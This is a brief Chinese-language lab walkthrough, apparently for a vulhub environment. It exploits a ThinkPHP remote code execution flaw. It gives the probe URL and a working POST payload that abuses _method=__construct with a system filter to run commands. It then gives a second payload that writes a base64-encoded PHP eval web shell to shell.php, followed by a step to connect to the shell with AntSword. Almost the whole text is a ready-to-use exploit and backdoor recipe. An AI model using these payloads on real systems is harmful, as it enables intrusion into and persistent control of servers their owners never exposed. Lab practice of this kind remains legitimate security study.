1.在vulhub打开环境
进入环境存在的文件
docker-compose up -d
2.浏览器访问环境
3.查看是否存在漏洞
/index.php?s=captcha
页面报错说明有可能存在
4.使用hackbar插件发送post请求
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=dir
5.通过echo命令写入一句话木马
先对一句话木马进行base64编码
6.构造payload发送请求
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > shell.php
7.访问木马进行连接
使用蚁剑进行连接
